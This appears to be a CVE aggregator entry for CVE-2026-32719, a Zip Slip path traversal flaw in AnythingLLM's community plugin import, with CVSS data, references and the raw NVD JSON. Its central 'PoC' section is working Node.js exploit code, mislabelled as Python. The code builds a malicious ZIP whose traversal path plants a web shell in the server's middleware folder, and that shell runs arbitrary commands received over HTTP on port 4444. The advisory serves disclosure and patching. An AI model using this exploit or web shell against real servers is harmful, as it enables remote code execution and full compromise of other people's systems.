CVE-2026-32719

Description

AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. In 1.11.1 and earlier, The ImportedPlugin.importCommunityItemFromUrl() function in server/utils/agents/imported.js downloads a ZIP file from a community hub URL and extracts it using AdmZip.extractAllTo() without validating file paths within the archive. This enables a Zip Slip path traversal attack that can lead to arbitrary code execution.

CVSS Details

CVSS Score

4.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:* - VULNERABLE

AnythingLLM <= 1.11.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-32719 PoC - Zip Slip Path Traversal in AnythingLLM
// This PoC demonstrates how to create a malicious ZIP file for exploiting the Zip Slip vulnerability

const fs = require('fs');
const archiver = require('archiver');

// Target file to write via Zip Slip
const maliciousFilename = '../../../workspace/anything-llm/server/middleware/malicious.js';
const maliciousContent = `// Malicious code - webshell or reverse shell
const http = require('http');

// Simple web shell example
http.createServer((req, res) => {
  const { spawn } = require('child_process');
  const cmd = require('url').parse(req.url, true).query.cmd;
  
  if (cmd) {
    const child = spawn(cmd, { shell: true });
    let output = '';
    child.stdout.on('data', (data) => { output += data; });
    child.stderr.on('data', (data) => { output += data; });
    child.on('close', () => {
      res.writeHead(200, { 'Content-Type': 'text/plain' });
      res.end(output);
    });
  }
}).listen(4444);

console.log('[+] Malicious server running on port 4444');
`;

// Create malicious ZIP file
const output = fs.createWriteStream('malicious-plugin.zip');
const archive = archiver('zip', { zlib: { level: 9 } });

archive.pipe(output);

// Add malicious file with path traversal in filename
archive.append(maliciousContent, { name: maliciousFilename });

archive.finalize();

console.log('[+] Created malicious-plugin.zip');
console.log('[+] Filename contains path traversal: ' + maliciousFilename);
console.log('[+] When extracted by vulnerable AnythingLLM, file will be written to:');
console.log('    ' + maliciousFilename);

// Alternative: Direct ZIP manipulation example
// Using zip slip pattern: ../../../path/to/target
// The AdmZip.extractAllTo() will write files outside intended directory

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32719
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32719
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32719/
[4] VulDB https://vuldb.com/cve/CVE-2026-32719
[5] https://github.com/Mintplex-Labs/anything-llm/commit/6a492f038da195a5c9a239d5ca2e9f2151c25f8c
[6] https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-rh66-4w74-cf4m

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32719", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:42.837", "lastModified": "2026-03-16T20:29:53.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. In 1.11.1 and earlier, The ImportedPlugin.importCommunityItemFromUrl() function in server/utils/agents/imported.js downloads a ZIP file from a community hub URL and extracts it using AdmZip.extractAllTo() without validating file paths within the archive. This enables a Zip Slip path traversal attack that can lead to arbitrary code execution."}, {"lang": "es", "value": "AnythingLLM es una aplicación que convierte fragmentos de contenido en contexto que cualquier LLM puede usar como referencias durante el chat. En la versión 1.11.1 y anteriores, la función ImportedPlugin.importCommunityItemFromUrl() en el servidor/utils/agents/imported.js descarga un archivo ZIP de una URL de un centro comunitario y lo extrae usando AdmZip.extractAllTo() sin validar las rutas de archivo dentro del archivo. Esto permite un ataque de salto de ruta Zip Slip que puede conducir a la ejecución de código arbitrario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.11.1", "matchCriteriaId": "384FD8C3-E046-493C-9996-8E3042229081"}]}]}], "references": [{"url": "https://github.com/Mintplex-Labs/anything-llm/commit/6a492f038da195a5c9a239d5ca2e9f2151c25f8c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-rh66-4w74-cf4m", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory", "Mitigation"]}]}}